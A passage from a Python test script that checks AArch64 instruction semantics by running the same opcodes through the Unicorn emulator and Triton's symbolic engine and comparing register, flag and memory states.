("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2f\x00\x42\xfa", "ccmp x1, x2, 15, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x41\x14\x82\x9a", "cinc x1, x2, eq"),
("\x41\x04\x82\x9a", "cinc x1, x2, ne"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\xc1\xfd\xff\xd2", "movz x1, #0xffee, lsl #48"),
("\x81\xb9\xdb\xf2", "movk x1, #0xddcc, lsl #32"),
("\x41\x75\xb7\xf2", "movk x1, #0xbbaa, lsl #16"),
("\x01\x31\x93\xf2", "movk x1, #0x9988"),
("\x20\xfc\x40\xd3", "ubfiz x0, x1, #0, #64"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xf8\x7f\xd3", "ubfiz x0, x1, #1, #63"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xf4\x7e\xd3", "ubfiz x0, x1, #2, #62"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xf0\x7d\xd3", "ubfiz x0, x1, #3, #61"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xec\x7c\xd3", "ubfiz x0, x1, #4, #60"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xe8\x7b\xd3", "ubfiz x0, x1, #5, #59"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xe4\x7a\xd3", "ubfiz x0, x1, #6, #58"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xe0\x79\xd3", "ubfiz x0, x1, #7, #57"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xdc\x78\xd3", "ubfiz x0, x1, #8, #56"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\x7c\x7a\xd3", "ubfiz x0, x1, #6, #32"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\x00\x78\xd3", "ubfiz x0, x1, #8, #1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\x00\x41\xd3", "ubfiz x0, x1, #63, #1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\x00\x18\x53", "ubfiz w0, w1, #8, #1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\x00\x01\x53", "ubfiz w0, w1, #31, #1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\x7c\x00\x53", "ubfiz w0, w1, #0, #32"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x08\xc2\x9a", "udiv x0, x1, x2"),
("\x40\x08\xc1\x9a", "udiv x0, x2, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\x02\x00\x80\xd2", "movz x2, #0"),
("\x20\x08\xc2\x9a", "udiv x0, x1, x2"),
("\x40\x08\xc1\x9a", "udiv x0, x2, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x0c\xc2\x9a", "sdiv x0, x1, x2"),
("\x40\x0c\xc1\x9a", "sdiv x0, x2, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\x02\x00\x80\xd2", "movz x2, #0"),
("\x20\x0c\xc2\x9a", "sdiv x0, x1, x2"),
("\x40\x0c\xc1\x9a", "sdiv x0, x2, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x7c\xa2\x9b", "umull x0, w1, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\xc1\xfd\xff\xd2", "movz x1, #0xffee, lsl #48"),
("\x81\xb9\xdb\xf2", "movk x1, #0xddcc, lsl #32"),
("\x41\x75\xb7\xf2", "movk x1, #0xbbaa, lsl #16"),
("\x01\x31\x93\xf2", "movk x1, #0x9988"),
("\x20\x7c\xc1\x9b", "umulh x0, x1, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\xfc\xa2\x9b", "umnegl x0, w1, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x2c\xc2\x9a", "ror x0, x1, x2"),
("\x40\x2c\xc1\x9a", "ror x0, x2, x1"),
("\x40\x00\xc2\x93", "ror x0, x2, #0"),
("\x40\x04\xc2\x93", "ror x0, x2, #1"),
("\x40\x08\xc2\x93", "ror x0, x2, #2"),
("\x40\x0c\xc2\x93", "ror x0, x2, #3"),
("\x40\x10\xc2\x93", "ror x0, x2, #4"),
("\x40\xf8\xc2\x93", "ror x0, x2, #62"),
("\x40\xfc\xc2\x93", "ror x0, x2, #63"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x01\x00\x80\xd2", "mov x1, #0"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x41\x00\x80\xd2", "mov x1, #1 << 1"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x81\x00\x80\xd2", "mov x1, #1 << 2"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x01\x00\x82\xd2", "mov x1, #1 << 12"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x01\x00\x82\xd2", "mov x1, #1 << 12"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x01\x00\xb0\xd2", "mov x1, #1 << 31"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x21\x00\xc0\xd2", "mov x1, #1 << 32"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x41\x00\xc0\xd2", "mov x1, #1 << 33"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x01\x00\xe8\xd2", "mov x1, #1 << 62"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x01\x00\xf0\xd2", "mov x1, #1 << 63"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x21\x00\x80\xd2", "mov x1, #1 << 64"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\xfc\xdf\xc8", "ldar x5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\xfc\xdf\xc8", "ldar x9, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\xdf\xc8", "ldar x11, [sp]"),
("\xff\xff\xdf\xc8", "ldar xzr, [sp]"),
("\xe7\xff\xdf\x88", "ldar w7, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\xfc\xdf\x08", "ldarb w5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\xfc\xdf\x08", "ldarb w9, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\xdf\x08", "ldarb w11, [sp]"),
("\xff\xff\xdf\x08", "ldarb wzr, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\xfc\xdf\x48", "ldarh w5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\xfc\xdf\x48", "ldarh w9, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\xdf\x48", "ldarh w11, [sp]"),
("\xff\xff\xdf\x48", "ldarh wzr, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\xfc\x5f\xc8", "ldaxr x5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\xfc\x5f\xc8", "ldaxr x9, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\x5f\xc8", "ldaxr x11, [sp]"),
("\xff\xff\x5f\xc8", "ldaxr xzr, [sp]"),
("\xe7\xff\x5f\x88", "ldaxr w7, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\xfc\x5f\x08", "ldaxrb w5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\xfc\x5f\x08", "ldaxrb w9, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\x5f\x08", "ldaxrb w11, [sp]"),
("\xff\xff\x5f\x08", "ldaxrb wzr, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\xfc\x5f\x48", "ldaxrh w5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\xfc\x5f\x48", "ldaxrh w9, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\x5f\x48", "ldaxrh w11, [sp]"),
("\xff\xff\x5f\x48", "ldaxrh wzr, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x63\xa0\x84\xd2", "movz x3, #9475"),
("\x64\xa0\x84\xd2", "movz x4, #9475"),
("\xe5\x24\x81\xd2", "movz x5, #2343"),
("\xa6\xaf\x81\xd2", "movz x6, #3453"),
("\x87\x3a\x82\xd2", "movz x7, #4564"),
("\xe8\x16\x84\xd2", "movz x8, #8375"),
("\xe9\xc1\x84\xd2", "movz x9, #9743"),
("\xea\xaa\x82\xd2", "movz x10, #5463"),
("\x2b\xf8\x80\xd2", "movz x11, #1985"),
("\x25\xfc\x9f\xc8", "stlr x5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\x9f\xc8", "stlr x11, [sp]"),
("\x25\x00\x00\xf8", "stur x5, [x1]"),
("\x26\x00\x00\x38", "sturb w6, [x1]"),
("\x27\x00\x00\x78", "sturh w7, [x1]"),
("\x29\xfc\x9f\xc8", "stlr x9, [x1]"),
("\x2a\xfc\x9f\x08", "stlrb w10, [x1]"),
("\x2b\xfc\x9f\x48", "stlrh w11, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x21\x30\x00\x91", "add x1, x1, #12"), # STACK+12
("\x20\x7c\x5f\xc8", "ldxr x0, [x1]"),
("\x21\x30\x00\x91", "add x1, x1, #12"), # STACK+24
("\x20\x7c\x5f\x08", "ldxrb w0, [x1]"),
("\x21\x30\x00\x91", "add x1, x1, #12"), # STACK+36
("\x20\x7c\x5f\x48", "ldxrh w0, [x1]"),
("\xc1\xfd\xff\xd2", "movz x1, #0xffee, lsl #48"),
("\x81\xb9\xdb\xf2", "movk x1, #0xddcc, lsl #32"),
("\x41\x75\xb7\xf2", "movk x1, #0xbbaa, lsl #16"),
("\x01\x31\x93\xf2", "movk x1, #0x9988"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x20\x0c\xc0\xda", "rev x0, x1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x20\x08\xc0\x5a", "rev w0, w1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x20\x04\xc0\xda", "rev16 x0, x1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x20\x04\xc0\x5a", "rev16 w0, w1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x20\x08\xc0\xda", "rev32 x0, x1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x20\x00\xc0\xda", "rbit x0, x1"),
("\x20\x00\xc0\x5a", "rbit w0, w1"),
("\x20\x00\x80\xd2", "movz x0, #1"),
("\x20\x00\xc0\xda", "rbit x0, x1"),
("\x20\x00\xc0\x5a", "rbit w0, w1"),
]
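# Execute a single opcode under Unicorn: map the code at ADDR, seed stack,
# heap and every general-purpose register from `istate`, run just that one
# instruction and return the resulting architectural state as a plain dict.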
def emu_with_unicorn(opcode, istate):
mu = Uc(UC_ARCH_ARM64, UC_MODE_ARM)
mu.mem_map(ADDR, SIZE)
index = 0
for op, _ in CODE:
mu.mem_write(ADDR+index, op)
index += len(op)
mu.mem_write(STACK, bytes(istate['stack']))
mu.mem_write(HEAP, bytes(istate['heap']))
mu.reg_write(UC_ARM64_REG_X0, istate['x0'])
mu.reg_write(UC_ARM64_REG_X1, istate['x1'])
mu.reg_write(UC_ARM64_REG_X2, istate['x2'])
mu.reg_write(UC_ARM64_REG_X3, istate['x3'])
mu.reg_write(UC_ARM64_REG_X4, istate['x4'])
mu.reg_write(UC_ARM64_REG_X5, istate['x5'])
mu.reg_write(UC_ARM64_REG_X6, istate['x6'])
mu.reg_write(UC_ARM64_REG_X7, istate['x7'])
mu.reg_write(UC_ARM64_REG_X8, istate['x8'])
mu.reg_write(UC_ARM64_REG_X9, istate['x9'])
mu.reg_write(UC_ARM64_REG_X10, istate['x10'])
mu.reg_write(UC_ARM64_REG_X11, istate['x11'])
mu.reg_write(UC_ARM64_REG_X12, istate['x12'])
mu.reg_write(UC_ARM64_REG_X13, istate['x13'])
mu.reg_write(UC_ARM64_REG_X14, istate['x14'])
mu.reg_write(UC_ARM64_REG_X15, istate['x15'])
mu.reg_write(UC_ARM64_REG_X16, istate['x16'])
mu.reg_write(UC_ARM64_REG_X17, istate['x17'])
mu.reg_write(UC_ARM64_REG_X18, istate['x18'])
mu.reg_write(UC_ARM64_REG_X19, istate['x19'])
mu.reg_write(UC_ARM64_REG_X20, istate['x20'])
mu.reg_write(UC_ARM64_REG_X21, istate['x21'])
mu.reg_write(UC_ARM64_REG_X22, istate['x22'])
mu.reg_write(UC_ARM64_REG_X23, istate['x23'])
mu.reg_write(UC_ARM64_REG_X24, istate['x24'])
mu.reg_write(UC_ARM64_REG_X25, istate['x25'])
mu.reg_write(UC_ARM64_REG_X26, istate['x26'])
mu.reg_write(UC_ARM64_REG_X27, istate['x27'])
mu.reg_write(UC_ARM64_REG_X28, istate['x28'])
mu.reg_write(UC_ARM64_REG_X29, istate['x29'])
mu.reg_write(UC_ARM64_REG_X30, istate['x30'])
mu.reg_write(UC_ARM64_REG_PC, istate['pc'])
mu.reg_write(UC_ARM64_REG_SP, istate['sp'])
mu.reg_write(UC_ARM64_REG_NZCV, istate['n'] << 31 | istate['z'] << 30 | istate['c'] << 29 | istate['v'] << 28)
mu.emu_start(istate['pc'], istate['pc'] + len(opcode))
ostate = {
"stack": mu.mem_read(STACK, 0x100),
"heap": mu.mem_read(HEAP, 0x100),
"x0": mu.reg_read(UC_ARM64_REG_X0),
"x1": mu.reg_read(UC_ARM64_REG_X1),
"x2": mu.reg_read(UC_ARM64_REG_X2),
"x3": mu.reg_read(UC_ARM64_REG_X3),
"x4": mu.reg_read(UC_ARM64_REG_X4),
"x5": mu.reg_read(UC_ARM64_REG_X5),
"x6": mu.reg_read(UC_ARM64_REG_X6),
"x7": mu.reg_read(UC_ARM64_REG_X7),
"x8": mu.reg_read(UC_ARM64_REG_X8),
"x9": mu.reg_read(UC_ARM64_REG_X9),
"x10": mu.reg_read(UC_ARM64_REG_X10),
"x11": mu.reg_read(UC_ARM64_REG_X11),
"x12": mu.reg_read(UC_ARM64_REG_X12),
"x13": mu.reg_read(UC_ARM64_REG_X13),
"x14": mu.reg_read(UC_ARM64_REG_X14),
"x15": mu.reg_read(UC_ARM64_REG_X15),
"x16": mu.reg_read(UC_ARM64_REG_X16),
"x17": mu.reg_read(UC_ARM64_REG_X17),
"x18": mu.reg_read(UC_ARM64_REG_X18),
"x19": mu.reg_read(UC_ARM64_REG_X19),
"x20": mu.reg_read(UC_ARM64_REG_X20),
"x21": mu.reg_read(UC_ARM64_REG_X21),
"x22": mu.reg_read(UC_ARM64_REG_X22),
"x23": mu.reg_read(UC_ARM64_REG_X23),
"x24": mu.reg_read(UC_ARM64_REG_X24),
"x25": mu.reg_read(UC_ARM64_REG_X25),
"x26": mu.reg_read(UC_ARM64_REG_X26),
"x27": mu.reg_read(UC_ARM64_REG_X27),
"x28": mu.reg_read(UC_ARM64_REG_X28),
"x29": mu.reg_read(UC_ARM64_REG_X29),
"x30": mu.reg_read(UC_ARM64_REG_X30),
"x30": mu.reg_read(UC_ARM64_REG_X30),
"pc": mu.reg_read(UC_ARM64_REG_PC),
"sp": mu.reg_read(UC_ARM64_REG_SP),
"n": ((mu.reg_read(UC_ARM64_REG_NZCV) >> 31) & 1),
"z": ((mu.reg_read(UC_ARM64_REG_NZCV) >> 30) & 1),
"c": ((mu.reg_read(UC_ARM64_REG_NZCV) >> 29) & 1),
"v": ((mu.reg_read(UC_ARM64_REG_NZCV) >> 28) & 1),
}
return ostate
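# Same single-instruction execution, but through Triton's symbolic engine;
# the returned dict mirrors emu_with_unicorn() so the two output states can
# be compared field by field.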
def emu_with_triton(opcode, istate):
ctx = TritonContext()
ctx.setArchitecture(ARCH.AARCH64)
inst = Instruction(opcode)
inst.setAddress(istate['pc'])
ctx.setConcreteMemoryAreaValue(STACK, bytes(istate['stack']))
ctx.setConcreteMemoryAreaValue(HEAP, bytes(istate['heap']))
ctx.setConcreteRegisterValue(ctx.registers.x0, istate['x0'])
ctx.setConcreteRegisterValue(ctx.registers.x1, istate['x1'])
ctx.setConcreteRegisterValue(ctx.registers.x2, istate['x2'])
ctx.setConcreteRegisterValue(ctx.registers.x3, istate['x3'])
ctx.setConcreteRegisterValue(ctx.registers.x4, istate['x4'])
ctx.setConcreteRegisterValue(ctx.registers.x5, istate['x5'])
ctx.setConcreteRegisterValue(ctx.registers.x6, istate['x6'])
ctx.setConcreteRegisterValue(ctx.registers.x7, istate['x7'])
ctx.setConcreteRegisterValue(ctx.registers.x8, istate['x8'])
ctx.setConcreteRegisterValue(ctx.registers.x9, istate['x9'])
ctx.setConcreteRegisterValue(ctx.registers.x10, istate['x10'])
ctx.setConcreteRegisterValue(ctx.registers.x11, istate['x11'])
ctx.setConcreteRegisterValue(ctx.registers.x12, istate['x12'])
ctx.setConcreteRegisterValue(ctx.registers.x13, istate['x13'])
ctx.setConcreteRegisterValue(ctx.registers.x14, istate['x14'])
ctx.setConcreteRegisterValue(ctx.registers.x15, istate['x15'])
ctx.setConcreteRegisterValue(ctx.registers.x16, istate['x16'])
ctx.setConcreteRegisterValue(ctx.registers.x17, istate['x17'])
ctx.setConcreteRegisterValue(ctx.registers.x18, istate['x18'])
ctx.setConcreteRegisterValue(ctx.registers.x19, istate['x19'])
ctx.setConcreteRegisterValue(ctx.registers.x20, istate['x20'])
ctx.setConcreteRegisterValue(ctx.registers.x21, istate['x21'])
ctx.setConcreteRegisterValue(ctx.registers.x22, istate['x22'])
ctx.setConcreteRegisterValue(ctx.registers.x23, istate['x23'])
ctx.setConcreteRegisterValue(ctx.registers.x24, istate['x24'])
ctx.setConcreteRegisterValue(ctx.registers.x25, istate['x25'])
ctx.setConcreteRegisterValue(ctx.registers.x26, istate['x26'])
ctx.setConcreteRegisterValue(ctx.registers.x27, istate['x27'])
ctx.setConcreteRegisterValue(ctx.registers.x28, istate['x28'])
ctx.setConcreteRegisterValue(ctx.registers.x29, istate['x29'])
ctx.setConcreteRegisterValue(ctx.registers.x30, istate['x30'])
ctx.setConcreteRegisterValue(ctx.registers.pc, istate['pc'])
ctx.setConcreteRegisterValue(ctx.registers.sp, istate['sp'])
ctx.setConcreteRegisterValue(ctx.registers.n, istate['n'])
ctx.setConcreteRegisterValue(ctx.registers.z, istate['z'])
ctx.setConcreteRegisterValue(ctx.registers.c, istate['c'])
ctx.setConcreteRegisterValue(ctx.registers.v, istate['v'])
ctx.processing(inst)
ostate = {
"stack": ctx.getConcreteMemoryAreaValue(STACK, 0x100),
"heap": ctx.getConcreteMemoryAreaValue(HEAP, 0x100),
"x0": ctx.getSymbolicRegisterValue(ctx.registers.x0),
"x1": ctx.getSymbolicRegisterValue(ctx.registers.x1),
"x2": ctx.getSymbolicRegisterValue(ctx.registers.x2),
"x3": ctx.getSymbolicRegisterValue(ctx.registers.x3),
"x4": ctx.getSymbolicRegisterValue(ctx.registers.x4),
"x5": ctx.getSymbolicRegisterValue(ctx.registers.x5),
"x6": ctx.getSymbolicRegisterValue(ctx.registers.x6),
"x7": ctx.getSymbolicRegisterValue(ctx.registers.x7),
"x8": ctx.getSymbolicRegisterValue(ctx.registers.x8),
"x9": ctx.getSymbolicRegisterValue(ctx.registers.x9),
"x10": ctx.getSymbolicRegisterValue(ctx.registers.x10),
"x11": ctx.getSymbolicRegisterValue(ctx.registers.x11),
"x12": ctx.getSymbolicRegisterValue(ctx.registers.x12),
"x13": ctx.getSymbolicRegisterValue(ctx.registers.x13),
"x14": ctx.getSymbolicRegisterValue(ctx.registers.x14),
"x15": ctx.getSymbolicRegisterValue(ctx.registers.x15),
"x16": ctx.getSymbolicRegisterValue(ctx.registers.x16),
"x17": ctx.getSymbolicRegisterValue(ctx.registers.x17),
"x18": ctx.getSymbolicRegisterValue(ctx.registers.x18),
"x19": ctx.getSymbolicRegisterValue(ctx.registers.x19),
"x20": ctx.getSymbolicRegisterValue(ctx.registers.x20),
"x21": ctx.getSymbolicRegisterValue(ctx.registers.x21),
"x22": ctx.getSymbolicRegisterValue(ctx.registers.x22),
"x23": ctx.getSymbolicRegisterValue(ctx.registers.x23),
"x24": ctx.getSymbolicRegisterValue(ctx.registers.x24),
"x25": ctx.getSymbolicRegisterValue(ctx.registers.x25),
"x26": ctx.getSymbolicRegisterValue(ctx.registers.x26),
"x27": ctx.getSymbolicRegisterValue(ctx.registers.x27),
"x28": ctx.getSymbolicRegisterValue(ctx.registers.x28),
"x29": ctx.getSymbolicRegisterValue(ctx.registers.x29),
"x30": ctx.getSymbolicRegisterValue(ctx.registers.x30),
"x30": ctx.getSymbolicRegisterValue(ctx.registers.x30),
